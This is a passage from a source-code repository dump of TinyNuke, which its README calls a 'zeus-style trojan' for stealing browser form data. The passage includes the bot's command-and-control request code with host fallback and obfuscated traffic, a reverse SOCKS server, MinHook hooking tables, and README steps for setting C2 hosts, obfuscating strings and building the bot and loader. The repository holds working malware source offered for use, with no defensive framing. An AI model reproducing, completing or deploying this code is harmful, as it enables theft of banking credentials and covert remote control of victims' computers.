0x00,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 57 | 0x00,0xff,0xff,0x00,0x00,0x00,0xbf,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 58 | 0x7f,0x00,0x00,0xff,0x4a,0x4a,0x4a,0x4a,0x4b,0x52,0x4a,0x4a,0x4a,0x4a,0x4f, 59 | 0x4c,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a,0x55,0x45,0x40,0x4a,0x4a,0x4a, 60 | 0x45,0x59,0x4d,0x46,0x4a,0x5d,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a, 61 | 0x4a,0x4a,0x4a,0x4a,0x4a,0x61,0x63,0x67,0x4e,0x4a,0x4a,0x6b,0x6d,0x4a,0x4a, 62 | 0x45,0x6d,0x4a,0x4a,0x44,0x45,0x4a,0x4a,0x00,0x00,0x00,0x02,0x0d,0x06,0x06, 63 | 0x06,0x06,0x0e,0x00,0x00,0x00,0x00,0x06,0x06,0x06,0x00,0x06,0x06,0x02,0x06, 64 | 0x00,0x0a,0x0a,0x07,0x07,0x06,0x02,0x05,0x05,0x02,0x02,0x00,0x00,0x04,0x04, 65 | 0x04,0x04,0x00,0x00,0x00,0x0e,0x05,0x06,0x06,0x06,0x01,0x06,0x00,0x00,0x08, 66 | 0x00,0x10,0x00,0x18,0x00,0x20,0x00,0x28,0x00,0x30,0x00,0x80,0x01,0x82,0x01, 67 | 0x86,0x00,0xf6,0xcf,0xfe,0x3f,0xab,0x00,0xb0,0x00,0xb1,0x00,0xb3,0x00,0xba, 68 | 0xf8,0xbb,0x00,0xc0,0x00,0xc1,0x00,0xc7,0xbf,0x62,0xff,0x00,0x8d,0xff,0x00, 69 | 0xc4,0xff,0x00,0xc5,0xff,0x00,0xff,0xff,0xeb,0x01,0xff,0x0e,0x12,0x08,0x00, 70 | 0x13,0x09,0x00,0x16,0x08,0x00,0x17,0x09,0x00,0x2b,0x09,0x00,0xae,0xff,0x07, 71 | 0xb2,0xff,0x00,0xb4,0xff,0x00,0xb5,0xff,0x00,0xc3,0x01,0x00,0xc7,0xff,0xbf, 72 | 0xe7,0x08,0x00,0xf0,0x02,0x00 73 | }; 74 | -------------------------------------------------------------------------------- /MinHook/src/hde/table64.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Hacker Disassembler Engine 64 C 3 | * Copyright (c) 2008-2009, Vyacheslav Patkov. 4 | * All rights reserved. 5 | * 6 | */ 7 | 8 | #define C_NONE 0x00 9 | #define C_MODRM 0x01 10 | #define C_IMM8 0x02 11 | #define C_IMM16 0x04 12 | #define C_IMM_P66 0x10 13 | #define C_REL8 0x20 14 | #define C_REL32 0x40 15 | #define C_GROUP 0x80 16 | #define C_ERROR 0xff 17 | 18 | #define PRE_ANY 0x00 19 | #define PRE_NONE 0x01 20 | #define PRE_F2 0x02 21 | #define PRE_F3 0x04 22 | #define PRE_66 0x08 23 | #define PRE_67 0x10 24 | #define PRE_LOCK 0x20 25 | #define PRE_SEG 0x40 26 | #define PRE_ALL 0xff 27 | 28 | #define DELTA_OPCODES 0x4a 29 | #define DELTA_FPU_REG 0xfd 30 | #define DELTA_FPU_MODRM 0x104 31 | #define DELTA_PREFIXES 0x13c 32 | #define DELTA_OP_LOCK_OK 0x1ae 33 | #define DELTA_OP2_LOCK_OK 0x1c6 34 | #define DELTA_OP_ONLY_MEM 0x1d8 35 | #define DELTA_OP2_ONLY_MEM 0x1e7 36 | 37 | unsigned char hde64_table[] = { 38 | 0xa5,0xaa,0xa5,0xb8,0xa5,0xaa,0xa5,0xaa,0xa5,0xb8,0xa5,0xb8,0xa5,0xb8,0xa5, 39 | 0xb8,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xac,0xc0,0xcc,0xc0,0xa1,0xa1, 40 | 0xa1,0xa1,0xb1,0xa5,0xa5,0xa6,0xc0,0xc0,0xd7,0xda,0xe0,0xc0,0xe4,0xc0,0xea, 41 | 0xea,0xe0,0xe0,0x98,0xc8,0xee,0xf1,0xa5,0xd3,0xa5,0xa5,0xa1,0xea,0x9e,0xc0, 42 | 0xc0,0xc2,0xc0,0xe6,0x03,0x7f,0x11,0x7f,0x01,0x7f,0x01,0x3f,0x01,0x01,0xab, 43 | 0x8b,0x90,0x64,0x5b,0x5b,0x5b,0x5b,0x5b,0x92,0x5b,0x5b,0x76,0x90,0x92,0x92, 44 | 0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x6a,0x73,0x90, 45 | 0x5b,0x52,0x52,0x52,0x52,0x5b,0x5b,0x5b,0x5b,0x77,0x7c,0x77,0x85,0x5b,0x5b, 46 | 0x70,0x5b,0x7a,0xaf,0x76,0x76,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b, 47 | 0x5b,0x5b,0x86,0x01,0x03,0x01,0x04,0x03,0xd5,0x03,0xd5,0x03,0xcc,0x01,0xbc, 48 | 0x03,0xf0,0x03,0x03,0x04,0x00,0x50,0x50,0x50,0x50,0xff,0x20,0x20,0x20,0x20, 49 | 0x01,0x01,0x01,0x01,0xc4,0x02,0x10,0xff,0xff,0xff,0x01,0x00,0x03,0x11,0xff, 50 | 0x03,0xc4,0xc6,0xc8,0x02,0x10,0x00,0xff,0xcc,0x01,0x01,0x01,0x00,0x00,0x00, 51 | 0x00,0x01,0x01,0x03,0x01,0xff,0xff,0xc0,0xc2,0x10,0x11,0x02,0x03,0x01,0x01, 52 | 0x01,0xff,0xff,0xff,0x00,0x00,0x00,0xff,0x00,0x00,0xff,0xff,0xff,0xff,0x10, 53 | 0x10,0x10,0x10,0x02,0x10,0x00,0x00,0xc6,0xc8,0x02,0x02,0x02,0x02,0x06,0x00, 54 | 0x04,0x00,0x02,0xff,0x00,0xc0,0xc2,0x01,0x01,0x03,0x03,0x03,0xca,0x40,0x00, 55 | 0x0a,0x00,0x04,0x00,0x00,0x00,0x00,0x7f,0x00,0x33,0x01,0x00,0x00,0x00,0x00, 56 | 0x00,0x00,0xff,0xbf,0xff,0xff,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0xff,0x00, 57 | 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff, 58 | 0x00,0x00,0x00,0xbf,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x7f,0x00,0x00, 59 | 0xff,0x40,0x40,0x40,0x40,0x41,0x49,0x40,0x40,0x40,0x40,0x4c,0x42,0x40,0x40, 60 | 0x40,0x40,0x40,0x40,0x40,0x40,0x4f,0x44,0x53,0x40,0x40,0x40,0x44,0x57,0x43, 61 | 0x5c,0x40,0x60,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40, 62 | 0x40,0x40,0x64,0x66,0x6e,0x6b,0x40,0x40,0x6a,0x46,0x40,0x40,0x44,0x46,0x40, 63 | 0x40,0x5b,0x44,0x40,0x40,0x00,0x00,0x00,0x00,0x06,0x06,0x06,0x06,0x01,0x06, 64 | 0x06,0x02,0x06,0x06,0x00,0x06,0x00,0x0a,0x0a,0x00,0x00,0x00,0x02,0x07,0x07, 65 | 0x06,0x02,0x0d,0x06,0x06,0x06,0x0e,0x05,0x05,0x02,0x02,0x00,0x00,0x04,0x04, 66 | 0x04,0x04,0x05,0x06,0x06,0x06,0x00,0x00,0x00,0x0e,0x00,0x00,0x08,0x00,0x10, 67 | 0x00,0x18,0x00,0x20,0x00,0x28,0x00,0x30,0x00,0x80,0x01,0x82,0x01,0x86,0x00, 68 | 0xf6,0xcf,0xfe,0x3f,0xab,0x00,0xb0,0x00,0xb1,0x00,0xb3,0x00,0xba,0xf8,0xbb, 69 | 0x00,0xc0,0x00,0xc1,0x00,0xc7,0xbf,0x62,0xff,0x00,0x8d,0xff,0x00,0xc4,0xff, 70 | 0x00,0xc5,0xff,0x00,0xff,0xff,0xeb,0x01,0xff,0x0e,0x12,0x08,0x00,0x13,0x09, 71 | 0x00,0x16,0x08,0x00,0x17,0x09,0x00,0x2b,0x09,0x00,0xae,0xff,0x07,0xb2,0xff, 72 | 0x00,0xb4,0xff,0x00,0xb5,0xff,0x00,0xc3,0x01,0x00,0xc7,0xff,0xbf,0xe7,0x08, 73 | 0x00,0xf0,0x02,0x00 74 | }; 75 | -------------------------------------------------------------------------------- /MinHook/src/trampoline.h: -------------------------------------------------------------------------------- 1 | /* 2 | * MinHook - The Minimalistic API Hooking Library for x64/x86 3 | * Copyright (C) 2009-2016 Tsuda Kageyu. 4 | * All rights reserved. 5 | * 6 | * Redistribution and use in source and binary forms, with or without 7 | * modification, are permitted provided that the following conditions 8 | * are met: 9 | * 10 | * 1. Redistributions of source code must retain the above copyright 11 | * notice, this list of conditions and the following disclaimer. 12 | * 2. Redistributions in binary form must reproduce the above copyright 13 | * notice, this list of conditions and the following disclaimer in the 14 | * documentation and/or other materials provided with the distribution. 15 | * 16 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 17 | * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED 18 | * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A 19 | * PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER 20 | * OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 21 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 22 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR 23 | * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF 24 | * LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING 25 | * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 26 | * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 27 | */ 28 | 29 | #pragma once 30 | 31 | #pragma pack(push, 1) 32 | 33 | // Structs for writing x86/x64 instructions. 34 | 35 | // 8-bit relative jump. 36 | typedef struct _JMP_REL_SHORT 37 | { 38 | UINT8 opcode; // EB xx: JMP +2+xx 39 | UINT8 operand; 40 | } JMP_REL_SHORT, *PJMP_REL_SHORT; 41 | 42 | // 32-bit direct relative jump/call. 43 | typedef struct _JMP_REL 44 | { 45 | UINT8 opcode; // E9/E8 xxxxxxxx: JMP/CALL +5+xxxxxxxx 46 | UINT32 operand; // Relative destination address 47 | } JMP_REL, *PJMP_REL, CALL_REL; 48 | 49 | // 64-bit indirect absolute jump. 50 | typedef struct _JMP_ABS 51 | { 52 | UINT8 opcode0; // FF25 00000000: JMP [+6] 53 | UINT8 opcode1; 54 | UINT32 dummy; 55 | UINT64 address; // Absolute destination address 56 | } JMP_ABS, *PJMP_ABS; 57 | 58 | // 64-bit indirect absolute call. 59 | typedef struct _CALL_ABS 60 | { 61 | UINT8 opcode0; // FF15 00000002: CALL [+6] 62 | UINT8 opcode1; 63 | UINT32 dummy0; 64 | UINT8 dummy1; // EB 08: JMP +10 65 | UINT8 dummy2; 66 | UINT64 address; // Absolute destination address 67 | } CALL_ABS; 68 | 69 | // 32-bit direct relative conditional jumps. 70 | typedef struct _JCC_REL 71 | { 72 | UINT8 opcode0; // 0F8* xxxxxxxx: J** +6+xxxxxxxx 73 | UINT8 opcode1; 74 | UINT32 operand; // Relative destination address 75 | } JCC_REL; 76 | 77 | // 64bit indirect absolute conditional jumps that x64 lacks. 78 | typedef struct _JCC_ABS 79 | { 80 | UINT8 opcode; // 7* 0E: J** +16 81 | UINT8 dummy0; 82 | UINT8 dummy1; // FF25 00000000: JMP [+6] 83 | UINT8 dummy2; 84 | UINT32 dummy3; 85 | UINT64 address; // Absolute destination address 86 | } JCC_ABS; 87 | 88 | #pragma pack(pop) 89 | 90 | typedef struct _TRAMPOLINE 91 | { 92 | LPVOID pTarget; // [In] Address of the target function. 93 | LPVOID pDetour; // [In] Address of the detour function. 94 | LPVOID pTrampoline; // [In] Buffer address for the trampoline and relay function. 95 | 96 | #ifdef _M_X64 97 | LPVOID pRelay; // [Out] Address of the relay function. 98 | #endif 99 | BOOL patchAbove; // [Out] Should use the hot patch area? 100 | UINT nIP; // [Out] Number of the instruction boundaries. 101 | UINT8 oldIPs[8]; // [Out] Instruction boundaries of the target function. 102 | UINT8 newIPs[8]; // [Out] Instruction boundaries of the trampoline function. 103 | } TRAMPOLINE, *PTRAMPOLINE; 104 | 105 | BOOL CreateTrampolineFunction(PTRAMPOLINE ct); 106 | -------------------------------------------------------------------------------- /Panel.cpp: -------------------------------------------------------------------------------- 1 | #include "Panel.h" 2 | #include "Utils.h" 3 | #include "HTTP.h" 4 | 5 | static char *gKey = NULL; 6 | static char gBotId[BOT_ID_LEN] = { 0 }; 7 | static char gPath [256] = { 0 }; 8 | static int gHostIndex = 0; 9 | static HttpRequestData gRequest = { 0 }; 10 | static CRITICAL_SECTION gSwitchCritSec; 11 | static CRITICAL_SECTION gInitCritSec; 12 | 13 | static void SwitchHost() 14 | { 15 | Funcs::pEnterCriticalSection(&gSwitchCritSec); 16 | ++gHostIndex; 17 | if(!HOST[gHostIndex]) 18 | gHostIndex = 0; 19 | Funcs::pLeaveCriticalSection(&gSwitchCritSec); 20 | Funcs::pSleep(POLL); 21 | } 22 | 23 | void InitPanelRequest() 24 | { 25 | Funcs::pInitializeCriticalSection(&gInitCritSec); 26 | } 27 | 28 | char *PanelRequest(char *data, int *outputSize) 29 | { 30 | if(!gKey) 31 | { 32 | EnterCriticalSection(&gInitCritSec); 33 | Funcs::pInitializeCriticalSection(&gSwitchCritSec); 34 | char request[32] = { 0 }; 35 | Funcs::pLstrcpyA(request, Strs::pingRequest); 36 | 37 | GetBotId(gBotId); 38 | 39 | Funcs::pLstrcpyA(gPath, PATH); 40 | Funcs::pLstrcatA(gPath, "?"); 41 | Funcs::pLstrcatA(gPath, gBotId); 42 | 43 | gRequest.host = HOST[gHostIndex]; 44 | gRequest.port = PORT; 45 | gRequest.path = gPath; 46 | gRequest.post = TRUE; 47 | 48 | while(!HttpSubmitRequest(gRequest)) 49 | { 50 | SwitchHost(); 51 | gRequest.host = HOST[gHostIndex]; 52 | } 53 | gKey = (char *) gRequest.outputBody; 54 | LeaveCriticalSection(&gInitCritSec); //useless 55 | } 56 | HttpRequestData request; 57 | Funcs::pMemcpy(&request, &gRequest, sizeof(gRequest)); 58 | 59 | request.inputBody = (BYTE *) data; 60 | request.inputBodySize = Funcs::pLstrlenA(data); 61 | 62 | Obfuscate(request.inputBody, request.inputBodySize, gKey); 63 | 64 | while(!HttpSubmitRequest(request)) 65 | { 66 | SwitchHost(); 67 | request.host = HOST[gHostIndex]; 68 | gRequest.host = HOST[gHostIndex]; 69 | } 70 | Obfuscate(request.outputBody, request.outputBodySize, gKey); 71 | if(outputSize) 72 | *outputSize = request.outputBodySize; 73 | return (char *) request.outputBody; 74 | } -------------------------------------------------------------------------------- /Panel.h: -------------------------------------------------------------------------------- 1 | #include "Common.h" 2 | 3 | char *PanelRequest(char *data, int *outputSize); 4 | void InitPanelRequest(); -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # NOTE 2 | This repo is a fork of [one](https://github.com/aainz/TinyNuke) which 3 | has since been deleted by its author. I didn't write the code, but 4 | find it useful (hence, forked it). I don't offer support for it, but don't plan to delete it either. 5 | 6 | Original README follows: 7 | 8 | ---- 9 | 10 | This repository contains the source code of TinyNuke which is a zeus-style trojan written by me. 11 | 12 | Main Features: 13 | ============== 14 | 15 | - Formgrabber and Webinjects for Firefox, Internet Explorer and Chrome. Can inject x86 as well as x64 browsers. 16 | - Reverse SOCKS 4 17 | - HVNC like Hidden Desktop 18 | - Trusteer Bypass 19 | - ~32kb binary with obfuscated strings ~20kb without 20 | 21 | Installation: 22 | ============= 23 | 24 | * To install the panel dump the db.sql file then login with the default panel credentials admin:pass and finally navigate to settings.php 25 | 26 | * Open TinyNuke.sln and provide your server Api.cpp like this: 27 | 28 | Strs::host[0] = ENC_STR_A"127.0.0.1"END_ENC_STR; 29 | Strs::host[1] = ENC_STR_A"backup-server"END_ENC_STR; 30 | Strs::host[2] = 0; 31 | 32 | To obfuscate strings between the ENC_STR_A and END_ENC_STR, backup Api.cpp then use the AutoEncrypt project, a binary is located in the root directory 33 | 34 | * Compile the Bot project for the x64 and x86 platforms and upload the binaries to the panel in the settings page 35 | 36 | * Upload your webinject file, format can be seen in private/injects.json in the panel folder if you have no webinjects provide an empty JSON object "{}" 37 | 38 | * Compile the Loader project to get your PE file 39 | 40 | Usage and additional info can be found within the code (HiddenDesktop/VNC server folder = HiddenDesktop, Reverse SOCKS 4 server = SocksServer) 41 | -------------------------------------------------------------------------------- /SocksServer/SocksServer.sdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rossja/TinyNuke/c1e04c36d3aa2dbd70fcb17063809798b00b1fcf/SocksServer/SocksServer.sdf -------------------------------------------------------------------------------- /SocksServer/SocksServer.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2012 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SocksServer", "SocksServer\SocksServer.vcxproj", "{0D9481EC-C350-405E-A9BE-A6A837A3CAFD}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Release|Win32 = Release|Win32 10 | EndGlobalSection 11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 12 | {0D9481EC-C350-405E-A9BE-A6A837A3CAFD}.Debug|Win32.ActiveCfg = Debug|Win32 13 | {0D9481EC-C350-405E-A9BE-A6A837A3CAFD}.Debug|Win32.Build.0 = Debug|Win32 14 | {0D9481EC-C350-405E-A9BE-A6A837A3CAFD}.Release|Win32.ActiveCfg = Release|Win32 15 | {0D9481EC-C350-405E-A9BE-A6A837A3CAFD}.Release|Win32.Build.0 = Release|Win32 16 | EndGlobalSection 17 | GlobalSection(SolutionProperties) = preSolution 18 | HideSolutionNode = FALSE 19 | EndGlobalSection 20 | EndGlobal 21 | -------------------------------------------------------------------------------- /SocksServer/SocksServer.v11.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rossja/TinyNuke/c1e04c36d3aa2dbd70fcb17063809798b00b1fcf/SocksServer/SocksServer.v11.suo -------------------------------------------------------------------------------- /SocksServer/SocksServer/Server.cpp: -------------------------------------------------------------------------------- 1 | #include "Server.h" 2 | 3 | #define TCP_STREAM_CON 0x01 4 | #define REQUEST_GRANTED 0x5A 5 | #define REQUEST_REJECTED 0x5B 6 | 7 | static const BYTE gc_magik[] = { 'A', 'V', 'E', '_', 'M', 'A', 'R', 'I', 'A', 1 }; 8 | 9 | static BOOL StartServer(INT port, SOCKET *s, SOCKADDR_IN *addr, INT *addrSize) 10 | { 11 | WSADATA wsa; 12 | *addrSize = sizeof(*addr); 13 | if(WSAStartup(MAKEWORD(2, 2), &wsa)) 14 | return FALSE; 15 | if((*s = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) 16 | return FALSE; 17 | 18 | (*addr).sin_family = AF_INET; 19 | (*addr).sin_addr.s_addr = INADDR_ANY; 20 | (*addr).sin_port = htons(port); 21 | 22 | if(bind(*s, (sockaddr *) addr, *addrSize) == SOCKET_ERROR) 23 | return FALSE; 24 | if(listen(*s, SOMAXCONN) == SOCKET_ERROR) 25 | return FALSE; 26 | 27 | getsockname(*s, (SOCKADDR *) addr, addrSize); 28 | return TRUE; 29 | } 30 | 31 | static BOOL QueryProxy(SOCKET s_recv, SOCKET s_send) 32 | { 33 | UINT bytes = 0; 34 | if(ioctlsocket(s_recv, FIONREAD, (u_long *) &bytes) == SOCKET_ERROR) 35 | return FALSE; 36 | 37 | if(bytes) 38 | { 39 | char buffer[2048]; 40 | if((bytes = recv(s_recv, buffer, sizeof(buffer), 0)) <= 0) 41 | return FALSE; 42 | if(send(s_send, buffer, bytes, 0) <= 0) 43 | return FALSE; 44 | } 45 | else 46 | Sleep(1); 47 | return TRUE; 48 | } 49 | 50 | struct ClientConnectionInfo 51 | { 52 | SOCKET proxyClientSocket; 53 | SOCKET clientServerSocket; 54 | }; 55 | 56 | static DWORD WINAPI ClientConnectionThread(PVOID param) 57 | { 58 | SOCKADDR_IN addr; 59 | INT addrSize = sizeof(addr); 60 | ClientConnectionInfo *info = (ClientConnectionInfo *) param; 61 | SOCKET clientSocket 62 | = accept(info->clientServerSocket, (SOCKADDR *) &addr, &addrSize); 63 | if(clientSocket == INVALID_SOCKET) 64 | goto exit; 65 | 66 | for (;;) 67 | { 68 | if(!QueryProxy(info->proxyClientSocket, clientSocket)) 69 | goto exit; 70 | if(!QueryProxy(clientSocket, info->proxyClientSocket)) 71 | goto exit; 72 | } 73 | exit: 74 | free(info); 75 | return 0; 76 | } 77 | 78 | static DWORD WINAPI ClientThread(PVOID param) 79 | { 80 | SOCKET s = (SOCKET) param; 81 | SOCKET proxySocket = NULL; 82 | SOCKET proxyClientSocket = NULL; 83 | SOCKET clientServerSocket = NULL; 84 | BYTE buf[sizeof(gc_magik)]; 85 | SOCKADDR_IN addr; 86 | INT addrSize; 87 | 88 | addrSize = sizeof(addr); 89 | getpeername(s, (SOCKADDR *) &addr, &addrSize); 90 | 91 | char *ip = inet_ntoa(addr.sin_addr); 92 | wprintf(L"Client %S connected\n", ip); 93 | 94 | if(recv(s, (char *) buf, sizeof(gc_magik), 0) <= 0) 95 | goto exit; 96 | 97 | if(memcmp(buf, gc_magik, sizeof(gc_magik))) 98 | goto exit; 99 | 100 | if(!StartServer(0, &proxySocket, &addr, &addrSize)) 101 | goto exit; 102 | 103 | wprintf(L"Client %S proxy port = %d\n", ip, ntohs(addr.sin_port)); 104 | 105 | for(;;) 106 | { 107 | proxyClientSocket = accept(proxySocket, (SOCKADDR *) &addr, &addrSize); 108 | 109 | if(s == INVALID_SOCKET) 110 | goto exit; 111 | 112 | if(!StartServer(0, &clientServerSocket, &addr, &addrSize)) 113 | goto exit; 114 | 115 | INT port = ntohs(addr.sin_port); 116 | if(send(s, (char *) &port, sizeof(port), 0) <= 0) 117 | goto exit; 118 | 119 | ClientConnectionInfo *info 120 | = (ClientConnectionInfo *) malloc(sizeof(*info)); 121 | if(!info) 122 | goto exit; 123 | 124 | info->clientServerSocket = clientServerSocket; 125 | info->proxyClientSocket = proxyClientSocket; 126 | 127 | if(!CreateThread(NULL, 0, ClientConnectionThread, (LPVOID) info, 0, 0)) 128 | goto exit; 129 | } 130 | exit: 131 | wprintf(L"Client %S disconnected\n", ip); 132 | closesocket(s); 133 | closesocket(proxySocket); 134 | closesocket(proxyClientSocket); 135 | closesocket(clientServerSocket); 136 | return 0; 137 | } 138 | 139 | BOOL ReverseSocksServer::Start(INT port) 140 | { 141 | SOCKET serverSocket; 142 | SOCKADDR_IN addr; 143 | INT addrSize; 144 | if(!StartServer(port, &serverSocket, &addr, &addrSize)) 145 | return FALSE; 146 | wprintf(L"Reverse SOCKS 4 Server Started! Listening on port %d\n", ntohs(addr.sin_port)); 147 | 148 | for(;;) 149 | { 150 | SOCKET s; 151 | SOCKADDR_IN addr; 152 | s = accept(serverSocket, (SOCKADDR *) &addr, &addrSize); 153 | if(s != INVALID_SOCKET) 154 | { 155 | if(!CreateThread(NULL, 0, ClientThread, (LPVOID) s, 0, 0)) 156 | return FALSE; 157 | } 158 | } 159 | return TRUE; 160 | } -------------------------------------------------------------------------------- /SocksServer/SocksServer/Server.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | 7 | #pragma comment(lib, "ws2_32.lib") 8 | 9 | namespace ReverseSocksServer 10 | { 11 | BOOL Start(INT port); 12 | } -------------------------------------------------------------------------------- /SocksServer/SocksServer/SocksServer.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | 14 | {0D9481EC-C350-405E-A9BE-A6A837A3CAFD} 15 | Win32Proj 16 | SocksServer 17 | 18 | 19 | 20 | Application 21 | true 22 | v110_xp 23 | Unicode 24 | 25 | 26 | Application 27 | false 28 | v110_xp 29 | true 30 | Unicode 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | true 44 | 45 | 46 | false 47 | 48 | 49 | 50 | 51 | 52 | Level3 53 | Disabled 54 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 55 | 56 | 57 | Console 58 | true 59 | 60 | 61 | 62 | 63 | Level3 64 | 65 | 66 | MaxSpeed 67 | true 68 | true 69 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 70 | MultiThreaded 71 | 72 | 73 | Console 74 | true 75 | true 76 | true 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | -------------------------------------------------------------------------------- /SocksServer/SocksServer/SocksServer.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | 26 | 27 | Header Files 28 | 29 | 30 | -------------------------------------------------------------------------------- /SocksServer/SocksServer/SocksServer.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 6666 5 | WindowsLocalDebugger 6 | 7 | -------------------------------------------------------------------------------- /SocksServer/SocksServer/main.cpp: -------------------------------------------------------------------------------- 1 | #include "Server.h" 2 | 3 | int main(int argc, char **argv) 4 | { 5 | if(argc < 1) 6 | wprintf(L"Port not provided\n"); 7 | else if(!ReverseSocksServer::Start(atoi(argv[1]))) 8 | wprintf(L"Could not start the server (Error: %d)\n", WSAGetLastError()); 9 | getchar(); 10 | return 0; 11 | } -------------------------------------------------------------------------------- /TinyNuke.VC.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rossja/TinyNuke/c1e04c36d3aa2dbd70fcb17063809798b00b1fcf/TinyNuke.VC.db -------------------------------------------------------------------------------- /TinyNuke.sdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rossja/TinyNuke/c1e04c36d3aa2dbd70fcb17063809798b00b1fcf/TinyNuke.sdf -------------------------------------------------------------------------------- /TinyNuke.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2012 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Loader", "Loader\Loader.vcxproj", "{AB612859-E2DD-46A0-94B7-49616C6D7365}" 5 | EndProject 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Bot", "Bot\Bot.vcxproj", "{8C66E36C-51F6-410F-8678-64358BC78BF7}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Win32 = Debug|Win32 11 | Debug|x64 = Debug|x64 12 | Release|Win32 = Release|Win32 13 | Release|x64 = Release|x64 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {AB612859-E2DD-46A0-94B7-49616C6D7365}.Debug|Win32.ActiveCfg = Debug|Win32 17 | {AB612859-E2DD-46A0-94B7-49616C6D7365}.Debug|Win32.Build.0 = Debug|Win32 18 | {AB612859-E2DD-46A0-94B7-49616C6D7365}.Debug|x64.ActiveCfg = Debug|x64 19 | {AB612859-E2DD-46A0-94B7-49616C6D7365}.Debug|x64.Build.0 = Debug|x64 20 | {AB612859-E2DD-46A0-94B7-49616C6D7365}.Release|Win32.ActiveCfg = interceptor|Win32 21 | {AB612859-E2DD-46A0-94B7-49616C6D7365}.Release|Win32.Build.0 = interceptor|Win32 22 | {AB612859-E2DD-46A0-94B7-49616C6D7365}.Release|x64.ActiveCfg = interceptor|x64 23 | {AB612859-E2DD-46A0-94B7-49616C6D7365}.Release|x64.Build.0 = interceptor|x64 24 | {8C66E36C-51F6-410F-8678-64358BC78BF7}.Debug|Win32.ActiveCfg = Debug|Win32 25 | {8C66E36C-51F6-410F-8678-64358BC78BF7}.Debug|Win32.Build.0 = Debug|Win32 26 | {8C66E36C-51F6-410F-8678-64358BC78BF7}.Debug|x64.ActiveCfg = Debug|x64 27 | {8C66E36C-51F6-410F-8678-64358BC78BF7}.Debug|x64.Build.0 = Debug|x64 28 | {8C66E36C-51F6-410F-8678-64358BC78BF7}.Release|Win32.ActiveCfg = interceptor|Win32 29 | {8C66E36C-51F6-410F-8678-64358BC78BF7}.Release|Win32.Build.0 = interceptor|Win32 30 | {8C66E36C-51F6-410F-8678-64358BC78BF7}.Release|x64.ActiveCfg = interceptor|x64 31 | {8C66E36C-51F6-410F-8678-64358BC78BF7}.Release|x64.Build.0 = interceptor|x64 32 | EndGlobalSection 